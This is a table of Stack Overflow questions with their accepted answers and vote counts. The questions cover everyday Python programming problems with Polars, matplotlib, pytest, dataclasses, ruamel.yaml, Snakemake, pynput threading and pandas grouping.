question_id | creation_date | link | question | accepted_answer | question_vote | answer_vote
---|---|---|---|---|---|---
79,557,781 | 2025-4-6 | https://stackoverflow.com/questions/79557781/error-using-cv2-in-python3-13-free-threading-mode | Without python3.13 free-threading, cv2 importing numpy is fine. But when python3.13 free-threading is turned on, when cv2 tries to import numpy, numpy gives this error: ImportError: Error importing numpy: you should not try to import numpy from its source directory; please exit the numpy source tree, and relaunch your python interpreter from there. Does this mean cv2 and python3.13 free-threading are not compatible? I'm relatively new to cv2, python3.13 and threading :) | Starting with the 3.13 release, CPython has experimental support for a build of Python called free threading where the global interpreter lock (GIL) is disabled. [...] The free-threaded mode is experimental and work is ongoing to improve it: expect some bugs and a substantial single-threaded performance hit. (From: https://docs.python.org/3/howto/free-threading-python.html. Emphasis mine.) I think that counts as "some bugs". You were right to try this. That's why they're offering this mode now, for users to test with all the things they care about. You could file issues about this with the Python, OpenCV, and Numpy projects. Then they will know to investigate and work on this. CPython (the canonical C Python implementation) tracks issues there: https://github.com/python/cpython/issues?q=is%3Aissue%20state%3Aopen%20label%3Atopic-free-threading It looks like pandas also has trouble importing numpy: https://github.com/python/cpython/issues/120653 | 1 | 1 |
79,556,592 | 2025-4-5 | https://stackoverflow.com/questions/79556592/how-to-repeat-and-truncate-list-elements-to-a-fixed-length | I have data that looks like: lf = pl.LazyFrame( { "points": [ [ [1.0, 2.0], ], [ [3.0, 4.0], [5.0, 6.0], ], [ [7.0, 8.0], [9.0, 10.0], [11.0, 12.0], ], ], "other": ["foo", "bar", "baz"], }, schema={ "points": pl.List(pl.Array(pl.Float32, 2)), "other": pl.String, }, ) And I want to make all lists have the same number of elements. If it currently has more than I need, it should truncate. If it has less than I need, it should repeat itself in order until it has enough. I managed to get it working, but I feel I am jumping through hoops. Is there a cleaner way of doing this? Maybe with gather? target_length = 3 result = ( lf.with_columns( needed=pl.lit(target_length).truediv(pl.col("points").list.len()).ceil() ) .with_columns( pl.col("points") .repeat_by("needed") .list.eval(pl.element().explode()) .list.head(target_length) ) .drop("needed") ) EDIT The method above works for toy examples, but when I try to use it in my real dataset, it fails with: pyo3_runtime.PanicException: Polars' maximum length reached. Consider installing 'polars-u64-idx'. I haven't been able to make a MRE for this, but my data has 4 million rows, and the "points" list on each row has between 1 and 8000 elements (and I'm trying to pad/truncate to 800 elements). These all seem pretty small, I don't see how a maximum u32 length is reached. I appreciate any alternative approaches I can try. The closest I have (which doesn't panic) is: But this doesn't pad repeating the list in order. It just pads repeating the last element. target_length = 3 result = ( lf.with_columns( pl.col("points") .list.gather( pl.int_range(target_length), null_on_oob=True, ) .list.eval(pl.element().forward_fill()) ) .drop("needed") ) | The repr defaults for lists are quite small, so we will increase them for the example. pl.Config(fmt_table_cell_list_len=8, fmt_str_lengths=120) If you use pl.int_ranges() (plural) and modulo arithmetic, you can generate the indices. target_length = 5 lf.select(pl.int_ranges(target_length) % pl.col("points").list.len()).collect() shape: (3, 1) ┌─────────────────┐ │ literal │ │ --- │ │ list[i64] │ ╞═════════════════╡ │ [0, 0, 0, 0, 0] │ │ [0, 1, 0, 1, 0] │ │ [0, 1, 2, 0, 1] │ └─────────────────┘ Which you can pass to .list.gather() lf.with_columns( pl.col("points").list.gather( pl.int_ranges(target_length) % pl.col("points").list.len() ) ).collect() shape: (3, 2) ┌──────────────────────────────────────────────────────────────────┬───────┐ │ points ┆ other │ │ --- ┆ --- │ │ list[array[f32, 2]] ┆ str │ ╞══════════════════════════════════════════════════════════════════╪═══════╡ │ [[1.0, 2.0], [1.0, 2.0], [1.0, 2.0], [1.0, 2.0], [1.0, 2.0]] ┆ foo │ │ [[3.0, 4.0], [5.0, 6.0], [3.0, 4.0], [5.0, 6.0], [3.0, 4.0]] ┆ bar │ │ [[7.0, 8.0], [9.0, 10.0], [11.0, 12.0], [7.0, 8.0], [9.0, 10.0]] ┆ baz │ └──────────────────────────────────────────────────────────────────┴───────┘ | 2 | 2 |
79,553,519 | 2025-4-3 | https://stackoverflow.com/questions/79553519/optimizing-k-ij-free-subgraph-detection-in-a-bounded-degree-graph | I am working with an undirected graph G where the maximum degree is bounded by a constant d. My goal is to check whether G contains a complete bipartite subgraph K_{i,j} as a subgraph, for small values of i, j (specifically, i, j < 8). I currently use the following brute-force approach to detect a K_{i,j} subgraph: nodes = [u for u in self.g if len(self.g[u]) >= j] set_combinations = combinations(nodes, i) for A in set_combinations: common_neighbors = set(self.g) for u in A: common_neighbors &= self.g[u] if len(common_neighbors) >= j: return False # K_ij found return True This method works correctly but becomes slow as the graph size increases. The main bottleneck seems to be: Enumerating all subsets of i nodes (O(n^i) complexity). Intersecting neighbor sets iteratively, which can be costly for large graphs. Given that the maximum degree is bounded and i, j are small, I wonder if there are more efficient approaches. | I incorporated an idea from the comments. I’m iterating through the nodes and, for each node, only consider its neighbors to construct the subgraph K_ij. This reduces the complexity of generating all possible combinations, but it’s still exponential for graphs with a high degree. def is_k_ij_free(self, i: int, j: int) -> bool: if i < 1 or j < 1: raise ValueError("i and j must be greater than 0") if i < j: # swap i and j for better runtime i, j = j, i nodes = {u for u in self.g if len(self.g[u]) >= j} for node in nodes: neighbor_i = {u for u in self.g[node] if len(self.g[u]) >= i} for A in combinations(neighbor_i, j): common_neighbors = set(self.g) for a in A: common_neighbors &= self.g[a] if len(common_neighbors) >= i: return False return True Feel free to further improve it, or point out any errors I have overseen. | 3 | 2 |
79,557,806 | 2025-4-6 | https://stackoverflow.com/questions/79557806/how-to-gracefully-ignore-non-matching-keyword-matching-arguments-in-python-datac | With normal classes you have **kwargs in the __init__ so non-matching keyword arguments can be ignored: class MyClass: def __init__(self, a, **kwargs): self.a=a my_class = MyClass(20, **{"kwarg1" : 1}) Is there an equivalent for @dataclass that can gracefully ignore non-matching keyword arguments without having to include an __init__? from dataclasses import dataclass @dataclass class MyClass: a: int my_class = MyClass(20, **{"kwarg1" : 1}) # TypeError: MyClass.__init__() got an unexpected keyword argument 'kwarg1' | TL;DR No, it's impossible This scenario was even quoted in the original pep introducing dataclass. I think it's against the original assumptions around dataclass - which would be simplify semantics at the expense of making functionality less flexible. vide pep-0557 Sometimes the generated init method does not suffice. For example, suppose you wanted to have an object to store *args and **kwargs: @dataclass(init=False) class ArgHolder: args: List[Any] kwargs: Mapping[Any, Any] def __init__(self, *args, **kwargs): self.args = args self.kwargs = kwargs a = ArgHolder(1, 2, three=3) | 2 | 1 |
79,553,451 | 2025-4-3 | https://stackoverflow.com/questions/79553451/generating-a-discrete-polar-surface-map-in-cartesian-coordinates | I would like to generate a surface plot with discrete arc-shaped cells on a 2D cartesian plane. I am able to get decent results by plotting a 3D surface plot (using plot_surface) and viewing it from the top, but matplotlib can be a bit finicky with 3D, so I'd prefer to do it in 2D. I can also get similar results using pcolormesh on a polar plot, but again, I want a 2D cartesian plane. How can I do this in matplotlib? MRE: import numpy as np import matplotlib.pyplot as plt r = np.linspace(2, 5, 25) theta = np.linspace(0, np.pi, 25) R, Theta = np.meshgrid(r, theta) X = R*np.cos(Theta) Y = r*np.sin(Theta) U = R*np.cos(Theta)*np.exp(R*Theta/500) fig, ax = plt.subplots(figsize=(8,6), subplot_kw={"projection":"3d"}) surf = ax.plot_surface(X, Y, U, cmap="viridis", rstride=1, cstride=1) ax.view_init(elev=90, azim=-90) ax.set_proj_type("ortho") ax.zaxis.line.set_lw(0.) ax.set_zticks([]) ax.set_aspect("equalxy") fig.colorbar(surf, shrink=0.5, aspect=5) fig.tight_layout() fig, ax = plt.subplots(figsize=(8,6), subplot_kw={"projection":"polar"}) ax.pcolor(Theta, R, U, shading="nearest") ax.set_xlim(0, np.pi) ax.grid(False) fig.tight_layout() 3D plot version: 2D polar plot version: | One solution could be to put together the plot from wedge patches. import numpy as np import matplotlib.pyplot as plt from matplotlib.patches import Wedge from matplotlib.collections import PatchCollection r = np.linspace(2, 5, 25) theta = np.linspace(0, np.pi, 25) r_mid = 0.5 * (r[:-1] + r[1:]) theta_mid = 0.5 * (theta[:-1] + theta[1:]) R, Theta = np.meshgrid(r_mid, theta_mid) U = R * np.cos(Theta) * np.exp(R * Theta / 500) patches = [] color = [] for i in range(len(theta) - 1): for j in range(len(r) - 1): t0, t1 = np.degrees(theta[i]), np.degrees(theta[i+1]) #angle bounds in degrees r0, r1 = r[j], r[j+1] #radial bounds wedge = Wedge(center=(0, 0), r=r1, theta1=t0, theta2=t1, width=r1 - r0) patches.append(wedge) color.append(U[i, j]) #coloring fig, ax = plt.subplots(figsize=(8, 6)) collection = PatchCollection(patches, array=np.array(color), cmap='viridis', edgecolor=None) ax.add_collection(collection) ax.set_xlim(-5.5, 5.5) ax.set_ylim(-0.5, 5.5) ax.set_aspect('equal') ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.spines['bottom'].set_color('black') ax.spines['left'].set_color('black') fig.colorbar(collection, ax=ax, shrink=0.5) plt.tight_layout() plt.show() | 2 | 2 |
79,557,330 | 2025-4-5 | https://stackoverflow.com/questions/79557330/how-can-i-fix-a-problem-regarding-problem-regarding-l1dist-call | class L1Dist(Layer): def __init__(self, **kwargs): super().__init__() def call(self, input_embedding, validation_img): return tf.math.abs(input_embedding - validation_img) Signature of method 'L1Dist.call()' does not match signature of the base method in class'Layer' how can i fix this problem? | I found the solution : class L1Dist(Layer): def __init__(self, **kwargs): super(L1Dist, self).__init__(**kwargs) def call(self, inputs, *args, **kwargs): input_embedding, validation_embedding = inputs return tf.math.abs(input_embedding - validation_embedding) Instead of having input_embedding and validation_embedding as separate parameters, the method now accepts a single inputs argument, which will be a tuple or list containing both embeddings. as per a tansorflow document and it matches with the base method. found in base_layer.py line 465. sorry i'm bad at explaining things. | 1 | 0 |
79,556,412 | 2025-4-5 | https://stackoverflow.com/questions/79556412/polars-efficient-list-of-substrings-counting | I have a Polars dataframe corpus with one string column, and millions of rows. I also have a list of substrings substrings. I can take a substring and query in how many rows that substring appears with: corpus.select(pl.col('contents').str.contains(substrings[0]).sum()).item() This works well for one substring, but I have 10,000 substrings to check. What is the most efficient way in Polars to check all of them? I have considered converting substrings into its own polars dataframe, and then performing an inner-join on substring presence, grouping by keyword, then counting the size of the groups. However, this seems very expensive from a RAM overhead perspective, and I am limited on RAM. Is there a better/cleaner way? Current slow approach: import polars as pl substrings = pl.DataFrame({'substring': ['a', 'b', 'c']}) corpus = pl.DataFrame({'contents': ['aBMMmcICmY', 'ORqkIJCwjV', 'JTQHufYApo', 'SNoqiJxpMY', 'SYbEsasrzt', 'XLinDPSRld', 'iInkOGqBDU', 'vBtykwGOqN', 'ZIpOdkkXBd', 'iUokuiefBS']}) def count_occurrences(substring): return corpus.select(pl.col('contents').str.contains(substring).sum()).item() substrings = substrings.with_columns(pl.col('substring').map_elements(count_occurrences).alias('frequency')) Outputting: shape: (3, 2) ┌───────────┬───────────┐ │ substring ┆ frequency │ │ --- ┆ --- │ │ str ┆ i64 │ ╞═══════════╪═══════════╡ │ a ┆ 2 │ │ b ┆ 1 │ │ c ┆ 1 │ └───────────┴───────────┘ | substrings = ["ab", "abc", "c"] df = pl.DataFrame({ "contents": ["abcMMmcICm", "ckIJCwjVab", "JTQHufYcpo", "SNoqabcpMY", "SYbEsasrzt"] }) .str.extract_many() has been the fastest way I've found to do this. df.with_columns( pl.col("contents").str.extract_many(substrings).alias("substring") ) shape: (5, 2) ┌────────────┬──────────────────┐ │ contents ┆ substring │ │ --- ┆ --- │ │ str ┆ list[str] │ ╞════════════╪══════════════════╡ │ abcMMmcICm ┆ ["ab", "c", "c"] │ # <- did not find 'abc' │ ckIJCwjVab ┆ ["c", "ab"] │ │ JTQHufYcpo ┆ ["c"] │ │ SNoqabcpMY ┆ ["ab", "c"] │ │ SYbEsasrzt ┆ [] │ └────────────┴──────────────────┘ You need to pass overlapping=True to get "all" the matches. shape: (5, 1) ┌─────────────────────────┐ │ substring │ │ --- │ │ list[str] │ ╞═════════════════════════╡ │ ["ab", "abc", "c", "c"] │ # <- "c" is also found twice │ ["c", "ab"] │ │ ["c"] │ │ ["ab", "abc", "c"] │ │ [] │ └─────────────────────────┘ We don't want to count the same row twice, so we add a row index, .explode() and .unique() If you .group_by() the substring, the length of the group is the count. ( df.select( pl.col("contents").str.extract_many(substrings, overlapping=True) .alias("substring") ) .with_row_index() .explode("substring") .unique() .group_by("substring") .len() .drop_nulls() # empty lists will be null ) shape: (3, 2) ┌───────────┬─────┐ │ substring ┆ len │ │ --- ┆ --- │ │ str ┆ u32 │ ╞═══════════╪═════╡ │ c ┆ 4 │ │ abc ┆ 2 │ │ ab ┆ 3 │ └───────────┴─────┘ Substrings that did not match will not be in the output, you would combine them in if required. | 1 | 1 |
79,556,360 | 2025-4-4 | https://stackoverflow.com/questions/79556360/pytest-fixture-is-changing-the-instance-returned-by-another-fixture | I'm very baffled and a little concerned to discover the following behaviour where I have two tests and two fixtures. import pytest @pytest.fixture def new_object(): return list() @pytest.fixture def a_string(new_object): # Change this instance of the object new_object.append(1) return "a string" def test_1(new_object): assert len(new_object) == 0 def test_2(a_string, new_object): assert len(new_object) == 0 The first test passes but the second one fails. def test_2(a_string, new_object): > assert len(new_object) == 0 E assert 1 == 0 E + where 1 = len([1]) tests/test_pytest_list.py:21: AssertionError ================================================ short test summary info ================================================= FAILED tests/test_pytest_list.py::test_2 - assert 1 == 0 ============================================== 1 failed, 1 passed in 0.36s =============================================== I expected fixtures to pass new instances of an object (unless specified otherwise), not the same object that some other fixture has modified. According to the documentation about the scope of fixtures it says: the default is to invoke once per test function Does another fixture not qualify as a function? UPDATE Based on the comments I now understand the issue, although I still think it's a dangerous behaviour for a unit-testing tool. Here's another invalid use of fixtures which a naive person like myself might not realize is wrong: @pytest.fixture def new_object(): """I want to test instances of this class""" return list() @pytest.fixture def case_1(new_object): new_object.append(1) return new_object @pytest.fixture def case_2(new_object): new_object.append(2) return new_object def test_cases(case_1, case_2): assert sum(case_1) + sum(case_2) == 3 # fails: assert (3 + 3) == 3 | The fixture new_object is invoked for each test as you clearly stated from the documentation. The issue lies within your second fixture and the usage of the combination of both in your second test. As pytest allows you to use fixtures more than once per test without affecting each other by using cached returns. That means as the fixture a_word uses the fixture new_object the second time new_object is encountered in your second test it uses the cached return value from the a_word fixture call instead of giving you another empty list. | 1 | 3 |
79,555,544 | 2025-4-4 | https://stackoverflow.com/questions/79555544/matplotlib-animation-doesnt-clear-previous-frame-before-plotting-new-one | So, I'm trying to create an animated plot, but I want the previous frame to be cleared before a new one appears. What I keep getting is all frames at the same time or just a blank plot. fig, ax = plt.subplots() campo = ax.plot(x2[0], phiSol[0])[0] def init(): campo.set_data([],[]) return campo def update(frame): campo.set_xdata(x2[:frame]) campo.set_ydata(phiSol[:frame]) return campo anima = ani.FuncAnimation(fig=fig, func=update, init_func=init, frames=40, interval=30) HTML(anima.to_jshtml()) I tried to build an init_func, but none of my tries worked. The last try is that one in the above code. How could I do it? | It's your slicing that's causing the problem. with :frame you're slicing up to frame instead of just grabbing the frame you want. You may have copied an example with a moving point that traces out a line . I just tried this, and it worked how you described. import numpy as np import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation # a sin wave, moving through space (test data) x2 = np.linspace(0, 2*np.pi, 100) phiSol = np.array([np.sin(x2 + phase) for phase in np.linspace(0, 2*np.pi, 60)]) fig, ax = plt.subplots() ax.set_xlim(np.min(x2), np.max(x2)) ax.set_ylim(np.min(phiSol), np.max(phiSol)) campo, = ax.plot([], []) def init(): campo.set_data([], []) return campo, def update(frame): campo.set_data(x2, phiSol[frame]) return campo, ani = FuncAnimation(fig, update, frames=len(phiSol), init_func=init, blit=True) # blit=True not necessary, but can optimize the animation. plt.show() Without the axis limits, mine was showing me an empty window, so you can try removing that and see how it goes, and add something similar if you have problems. I added a couple options to make it a bit better (campo,) to retrieve only the first thing returned by ax.plot instead of a list of objects, and blit=True which can optimize the creation of the animation if it gets slow (see FuncAnimation docs). | 2 | 3 |
79,555,896 | 2025-4-4 | https://stackoverflow.com/questions/79555896/python-script-locked-by-thread | I would like this Python 3.10 script (where the pynput code is partially based on this answer) to enter the while loop and at the same time monitor the keys pressed on the keyboard. When q is pressed, I would like it to end. (I do not know threads very well, but the while loop probably should run in the main thread and the keybord monitor should run in a child, concurrent thread). #!/usr/bin/python3 import threading import sys from pynput import keyboard def on_key_press(key): try: k = key.char except: k = key.name if k in ['q']: exit_time = True exit_time = False print("Press q to close.") keyboard_listener = keyboard.Listener(on_press=on_key_press) keyboard_listener.start() keyboard_listener.join() while not exit_time: sleep(1) print("Goodbye") sys.exit(0) It instead gets locked in an endless wait after keyboard_listener.start(). I don't know if keyboard_listener.join() doesn't run at all, or if it causes the program to lock. However, the while loop is not run. If I end the program with Ctrl+C: ^CTraceback (most recent call last): File "/my/source/./file.py", line 22, in <module> keyboard_listener.join() File "/my/.local/lib/python3.10/site-packages/pynput/_util/__init__.py", line 295, in join super(AbstractListener, self).join(timeout, *args) File "/usr/lib/python3.10/threading.py", line 1096, in join self._wait_for_tstate_lock() File "/usr/lib/python3.10/threading.py", line 1116, in _wait_for_tstate_lock if lock.acquire(block, timeout): KeyboardInterrupt | you are joining the listener thread, ie: waiting for it to exit. remove the while loop. the join is already waiting for the thread to exit. also from the docs Call pynput.keyboard.Listener.stop from anywhere, raise StopException or return False from a callback to stop the listener. you are waiting for the listener to exit, but you never really tell it to exit, you should probably return False to tell it to exit. def on_key_press(key): try: k = key.char except: k = key.name if k in ['q']: return False # end the listener and unlock the main thread if you want to do work within the while loop then remove the join, and use threading.Event, as you can wait for it to be signaled instead of sleeping. #!/usr/bin/python3 import threading import sys from pynput import keyboard from time import sleep def on_key_press(key): try: k = key.char except: k = key.name if k in ['q']: thread_exited.set() return False # end the listener and unlock the main thread thread_exited = threading.Event() print("Press q to close.") keyboard_listener = keyboard.Listener(on_press=on_key_press) keyboard_listener.start() # wait for 1 second for the flag to be set, returns true if it was set while not thread_exited.wait(1): print("doing some work ...") keyboard_listener.join() print("Goodbye") | 1 | 1 |
79,555,775 | 2025-4-4 | https://stackoverflow.com/questions/79555775/concatenate-rows-for-two-columns-in-panda-dataframe | I have the following dataframe: import pandas as pd d = {'Name': ['DataSource', 'DataSource'], 'DomainCode': ['Pr', 'Gov'], 'DomainName': ['Private', 'Government']} df = pd.DataFrame(data=d) So the dataframe is as follows: Name DomainCode DomainName 0 DataSource Pr Private 1 DataSource Gov Government I need to group it by the name to receive two lists: Name DomainCode DomainName 0 DataSource [Pr, Gov] [Private, Government] I understand how to do it for a single column: df = df.groupby("Name")["DomainCode"].apply(list).reset_index() when I receive Name DomainCode 0 A_DataSource [GOV, PR] but I cannot add the second column there whatever I tried. How to do this? One more question is that the list returned by the previous command is somehow not a list as it has a length of 1, and not two. | Please use the following line: df_grouped = df.groupby("Name").agg(list).reset_index() When you run this line df_grouped = df.groupby("Name")["DomainCode"].apply(list).reset_index() It returns 1 instead of 2 because Pandas is storing the list as a single string ('[Pr, Gov]') rather than a true Python list. For conversion to real list (from comment): import ast fake_list = "['Pr', 'Gov']" real_list = ast.literal_eval(fake_list) print(real_list) for item in real_list: print(item) Or: fake_list = "Pr, Gov" real_list = fake_list.split(", ") print(real_list) Or: import json fake_list = '["Pr", "Gov"]' real_list = json.loads(fake_list) print(real_list) Or: import re fake_list = "['Pr', 'Gov']" real_list = re.findall(r"'(.*?)'", fake_list) print(real_list) Output: | 1 | 1 |
79,553,686 | 2025-4-3 | https://stackoverflow.com/questions/79553686/how-to-flatten-a-mapping-constructed-from-a-tagged-scalar-using-ruamel-yaml | My aim is to create a YAML loader that can construct mappings from tagged scalars. Here is a stripped-down version of the loader which constructs an object containing names from a scalar tagged !fullname. import ruamel.yaml class MyLoader(ruamel.yaml.YAML): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.constructor.add_constructor("!fullname", self._fullname_constructor) @staticmethod def _fullname_constructor(constructor, node): value = constructor.construct_scalar(node) first, *middle, last = value.split() return { "first_name": first, "middle_names": middle, "last_name": last } myyaml = MyLoader() The loader can successfully substitute objects for tagged scalars i.e. >>> myyaml.load(""" - !fullname Albus Percival Wulfric Brian Dumbledore - !fullname Severus Snape""") [ {'first_name': 'Albus', 'middle_names': ['Percival', 'Wulfric', 'Brian'], 'last_name': 'Dumbledore'}, {'first_name': 'Severus', 'middle_names': [], 'last_name': 'Snape'} ] However, the construction fails when I try to merge the constructed mapping into an enclosing object >>> yaml.load(""" id: 0 <<: !fullname Albus Percival Wulfric Brian Dumbledore""") ruamel.yaml.constructor.ConstructorError: while constructing a mapping (...) expected a mapping or list of mappings for merging, but found scalar My understanding is that the type of the node is still a ScalarNode, so the constructor is unable to process it even though it ultimately resolves to a mapping. How to modify my code, such that !fullname {scalar} can be merged into the object? | The merge key language indepent type for YAML definition states: The “<<” merge key is used to indicate that all the keys of one or more specified maps should be inserted in to the current map. If the value associated with the key is a single mapping node, each of its key/value pairs is inserted into the current mapping, unless the key already exists in it. If the value associated with the merge key is a sequence, then this sequence is expected to contain mapping nodes and each of these nodes is merged in turn according to its order in the sequence. Keys in mapping nodes earlier in the sequence override keys specified in later mapping nodes. You have a scalar node, not a mapping node or a sequence of mapping nodes. This is independent of the (Python) type that gets constructed from the scalar node. If you want to adapt the parser to accept your non-YAML, you need to adapt the flattening routine that handles the merges. 
Among other things this expects a ruamel.yaml.commments.CommentedMap and not a simple dict: # coding: utf-8 import sys from pathlib import Path import ruamel.yaml import ruamel.yaml class MyConstructor(ruamel.yaml.constructor.RoundTripConstructor): def flatten_mapping(self, node): def constructed(value_node): if value_node in self.constructed_objects: value = self.constructed_objects[value_node] else: value = self.construct_object(value_node, deep=True) return value # merge = [] merge_map_list: List[Any] = [] index = 0 while index < len(node.value): key_node, value_node = node.value[index] if key_node.tag == 'tag:yaml.org,2002:merge': if merge_map_list: # double << key if self.allow_duplicate_keys: del node.value[index] index += 1 continue args = [ 'while constructing a mapping', node.start_mark, f'found duplicate key "{key_node.value}"', key_node.start_mark, """ To suppress this check see: http://yaml.readthedocs.io/en/latest/api.html#duplicate-keys """, """\ Duplicate keys will become an error in future releases, and are errors by default when using the new API. """, ] if self.allow_duplicate_keys is None: warnings.warn(DuplicateKeyFutureWarning(*args), stacklevel=1) else: raise DuplicateKeyError(*args) del node.value[index] cval = constructed(value_node) if isinstance(value_node, ruamel.yaml.nodes.MappingNode): merge_map_list.append((index, cval)) elif isinstance(value_node, ruamel.yaml.nodes.SequenceNode): for subnode in value_node.value: if not isinstance(subnode, ruamel.yaml.nodes.MappingNode): raise ConstructorError( 'while constructing a mapping', node.start_mark, f'expected a mapping for merging, but found {subnode.id!s}', subnode.start_mark, ) merge_map_list.append((index, constructed(subnode))) elif isinstance(value_node, ruamel.yaml.nodes.ScalarNode) and isinstance(cval, dict): merge_map_list.append((index, cval)) else: raise ConstructorError( 'while constructing a mapping', node.start_mark, 'expected a mapping or list of mappings for merging, ' f'but found {value_node.id!s}', value_node.start_mark, ) elif key_node.tag == 'tag:yaml.org,2002:value': key_node.tag = 'tag:yaml.org,2002:str' index += 1 else: index += 1 return merge_map_list class MyLoader(ruamel.yaml.YAML): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.Constructor = MyConstructor self.constructor.add_constructor("!fullname", self._fullname_constructor) @staticmethod def _fullname_constructor(constructor, node): value = constructor.construct_scalar(node) first, *middle, last = value.split() return ruamel.yaml.comments.CommentedMap({ "first_name": first, "middle_names": middle, "last_name": last }) myyaml = MyLoader() data = myyaml.load("""\ id: 0 <<: !fullname Albus Percival Wulfric Brian Dumbledore """) print(f'{data=}') print() myyaml.dump(data, sys.stdout) which gives: data={'id': 0, 'first_name': 'Albus', 'middle_names': ['Percival', 'Wulfric', 'Brian'], 'last_name': 'Dumbledore'} id: 0 <<: first_name: Albus middle_names: - Percival - Wulfric - Brian last_name: Dumbledore As you can see the merge is preserved when dumping, but the scalar is not reconstructed. | 1 | 1 |
79,550,367 | 2025-4-2 | https://stackoverflow.com/questions/79550367/snakemake-in-cluster-different-ways | When running snakemake on a cluster, and if we don't have specific requirements for some rules about number of cores/memory, then what is the difference between : Using the classic way, i.e. calling snakemake on the login node, telling it that executor is slurm and that we want X jobs with X cores each, optionally with a profile config file (1 job = 1 rule) Using snakemake like a normal tool, and call it with srun inside a sbatch script without telling it that this is a slurm environment (1 job = whole pipeline) Example of the second option: #!/bin/bash #SBATCH --job-name=test_sbatch_snakemake #SBATCH --nodes=1 #SBATCH --ntasks=1 #SBATCH --cpus-per-task=64 srun snakemake --cores 64 \ --latency-wait 30 \ --nolock \ --configfile configs/S_with_N.yaml I have a pipeline where I don't have any specific capacity requirement for my rules (I just want the maximum of them running in parallel), and I think the second option is easier to implement. | With the second way, your whole workflow will have to wait in the queue before individual rule instances can start. With the first way the resource demand will be spread across the jobs that snakemake will submit, so each rule has a chance to start earlier than what you would have to wait in the second way. (I use a third way: I sbatch a snakemake command that uses slurm as executor. In our cluster, it is considered bad practice to run the main snakemake on the submit/login node. This main snakemake doesn't wait too much in the queue, because it doesn't have to claim a lot of resources.) | 1 | 1 |
79,554,176 | 2025-4-3 | https://stackoverflow.com/questions/79554176/how-to-randomly-sample-n-ids-for-each-combination-of-group-id-and-date-in-a-pola | I am trying to randomly sample n IDs for each combination of group_id and date in a Polars DataFrame. However, I noticed that the sample function is producing the same set of IDs for each date no matter the group. Since I need to set a seed for replication purposes, I believe the issue is occurring because the same seed value is being applied across all combinations. I tried to resolve this by creating a unique seed for each combination by generating a "group_date_int" column by combining group_id and date casted as Int64, but I encountered the following error: .sample(n=n_samples, shuffle=True, seed=pl.col("group_date_int")) TypeError: argument 'seed': 'Expr' object cannot be interpreted as an integer For each date, I am getting the same set of IDs, rather than having a different random sample for each combination of group_id and date. import polars as pl df = pl.DataFrame( { "date": pl.date_range( pl.date(2010, 1, 1), pl.date(2025, 12, 1), "1mo", eager=True ).implode(), "group_id": [["bd01", "bd02", "bd03"]], "ids": [list(range(10))], } ).explode("date").explode("group_id").explode("ids") # Parameters n_samples = 3 # Number of random samples to pick for each group SEED = 42 # The seed used for sampling # Create `selected_samples` by sampling `n_samples` IDs per (group_id, date) combination selected_samples = ( df .group_by(['group_id', 'date']) .agg( pl.col("id") .sample(n=n_samples, shuffle=True, seed=SEED) .alias("random_ids") ) .explode("random_ids") .select(["group_id", "date", "random_ids"]) .rename({"random_ids": "id"}) ) Additionally, I tried using the shuffle function, but the results are the same: 1,6,5...1,6,5 ┌──────────┬────────────┬─────┐ │ group_id ┆ date ┆ id │ │ --- ┆ --- ┆ --- │ │ str ┆ str ┆ i64 │ ╞══════════╪════════════╪═════╡ │ bd01 ┆ 2025-07-01 ┆ 1 │ │ bd01 ┆ 2025-07-01 ┆ 6 │ │ bd01 ┆ 2025-07-01 ┆ 5 │ │ bd01 ┆ 2012-03-01 ┆ 1 │ │ bd01 ┆ 2012-03-01 ┆ 6 │ │ … ┆ … ┆ … │ │ bd03 ┆ 2024-10-01 ┆ 6 │ │ bd03 ┆ 2024-10-01 ┆ 5 │ │ bd01 ┆ 2010-08-01 ┆ 1 │ │ bd01 ┆ 2010-08-01 ┆ 6 │ │ bd01 ┆ 2010-08-01 ┆ 5 │ └──────────┴────────────┴─────┘ I was referred to the following question in the comments: Sample from each group in polars dataframe?, where a similar issue was raised. However, the solution does not include a seed, which is needed for replication. | If you need each group to be random but you also need to be able to set a seed to get predictable results then use numpy to generate random numbers and then choose your sample based on those like this. (Technically you could use base python to generate the random numbers but it's slower) First approach n_samples = 3 SEED = 46 np.random.seed(SEED) ( df .with_columns( pl.col("ids") .sort_by(pl.Series(np.random.normal(0,1,df.shape[0])))) .group_by("group_id","date",maintain_order=True) .agg(pl.col("ids").gather(range(n_samples))) .explode("ids") ) Note I also set maintain_order=True in the group_by as that would otherwise be random. Second approach Having to do a sort over the whole series might be needlessly expensive. If we use numpy to create a 2d array which is sorted rowwise then use that to pick our indices it, in theory, should be more efficient. However, this only works if you have a fixed number of members per group and you know how many in advance. 
First, make this function def keep_args(members_per_group: int, n_samples: int, rows: int): return pl.Series( np.argsort( np.random.normal(0, 1, (rows, members_per_group)), axis=1)[:, :n_samples], dtype=pl.List(pl.Int32), ) It's going to generate a 2d array where each row has a random list of indices to choose. We use it with our df like this np.random.seed(SEED) ( df .group_by("group_id","date",maintain_order=True) .agg(pl.col("ids")) .with_columns( pl.col("ids").map_batches(lambda s: ( s.list.gather(keep_args(10, n_samples, s.len())) )) ) .explode("ids") ) In this version, we do the group_by first which then means we need to use map_batches to get the new len of ids. If you prefer you could do a pipe and use the new df.height but I don't think it would make a big difference either way. Performance diff In testing those two, the first was 10.4ms and the second was 9.97ms so basically the same. Third approach Here's a polars only approach that is about 60x slower than the above. Basically it just chops up your df into the individual groups and then samples them. pl.concat([ g.sample(n_samples, seed=SEED) for (_, g) in df.group_by("group_id","date",maintain_order=True) ]) Fourth approach You can convert each of the groups to lazy to get parallelism which reduces the time by 33% making it just 40x slower than numpy approaches ( pl.concat([ g.lazy() .select( pl.col("group_id","date").first(), pl.col("ids") .sample(n_samples, seed=SEED) .implode() ) for (_, g) in df.group_by("group_id","date",maintain_order=True) ]) .explode("ids") .collect() ) Note about seed Maybe this goes without saying but just incase, the result between each approach will be different even with the same seed. The results are only consistent within a particular approach. Also, just to reiterate, you must use maintain_order=True in the first two approaches to get consistent results. | 1 | 1 |
